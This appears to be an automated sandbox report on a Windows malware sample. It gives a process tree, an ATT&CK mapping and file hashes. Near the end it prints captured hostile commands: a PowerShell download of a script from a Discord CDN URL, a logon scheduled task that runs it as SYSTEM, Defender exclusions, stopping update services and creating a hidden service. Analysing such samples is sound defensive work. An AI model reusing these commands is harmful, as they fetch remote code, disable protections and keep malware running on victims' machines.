C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:500

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2736

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:804

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4904

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:620

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2996

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4612

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2752

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4060

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2712

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:648

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1632

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4348

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2024

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2456

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3488

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1504

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3452

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2184

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3048

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3940

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2000

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:200

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2156

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3344

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3392

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2108

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:776

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2592

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4988

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:924

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3996

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4392

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4804

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4120

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5028

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:356

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4000

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4672

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2172

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2880

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1216

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2776

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4360

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3884

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2152

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1772

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4240

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1920

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2620

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3640

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3652

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2872

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4632

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4112

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3968

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1520

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5112

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4916

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3460

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2320

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2000

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2676

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4196

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2052

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:648

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4868

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2044

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4244

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4856

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4252

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4348

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4380

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5016

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:364

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4880

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5012

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:828

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1936

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1652

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5064

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3392

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2676

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2200

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2712

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:656

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1704

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:208

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2556

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3668

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4748

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1568

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2920

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2544

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4716

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4000

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4904

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:428

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4932

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:596

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4032

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1300

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1108

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4604

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3932

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4988

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4428

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4232

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4692

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3156

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3432

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5024

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2960

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4804

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1520

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4788

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4608

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4992

C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb1.exe
"C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb1.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:624

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\802C.tmp\802D.tmp\802E.bat C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb1.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:2396

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3920

C:\Windows\system32\where.exe
where node
6⤵
PID:4596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020

C:\Windows\system32\msiexec.exe
msiexec /i nodejs-installer.msi /quiet
6⤵
PID:4324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=66666921&is=666517a1&hm=88c7da706a3b1ece510f946feae59428d8b0ef0ff52158a75c9ba05ae13ad477&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4940

C:\Windows\system32\schtasks.exe
schtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F
6⤵
- Creates scheduled task(s)
PID:5056

C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb2.exe
"C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb2.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5028

C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb3.exe
"C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb3.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4908

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:4412

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:3636

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
5⤵
- Launches sc.exe
PID:3448

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:3260

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
5⤵
- Launches sc.exe
PID:4940

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
5⤵
- Launches sc.exe
PID:4036

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
5⤵
- Launches sc.exe
PID:308

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
PID:1412

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
PID:2672

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
PID:3296

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
PID:4884

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5036

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "AAWUFTXN"
5⤵
- Launches sc.exe
PID:3456

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
5⤵
- Launches sc.exe
PID:2832

C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb4.exe
"C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb4.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb4.exe
5⤵
- Views/modifies file attributes
PID:4252

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
5⤵
- Views/modifies file attributes
PID:3624

C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4680

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of UnmapMainImage
PID:3796

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4740

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:3792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4116

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2472

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:4636

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4552

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:1760

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:1316

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:3212

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:2224

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3264

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:1712

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding DF70C1AF97CDE05BF84B2AFD3506C598
2⤵
- Loads dropped DLL
PID:964

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding 60424682E811060FDA818643BAE27E89 E Global\MSI0000
2⤵
- Loads dropped DLL
- Modifies data under HKEY_USERS
PID:4684

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 36CB34000E0B1F74A5CCBC1E9720BFA7
2⤵
- Loads dropped DLL
PID:96

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2416

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

System Services

Service Execution

Scheduled Task/Job

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e58db5a.rbs
Filesize
822KB

MD5
89b86c9097cc4ee0e42ead867efc2972

SHA1
49fcf469a2e6619c001e7f4f5f065ecc00953e68

SHA256
de75a02e595df17cd97a3560746b17a50a9d1b417ad12877ed6b873bb1986455

SHA512
614979a1c9a26c6c29a283b5c9c4401bba46016585e8ea40e40951a79c29dbce45de39635f10dc3f26b43b00df83999440a1b419ce368c426e332f22e4271618

Download Submit
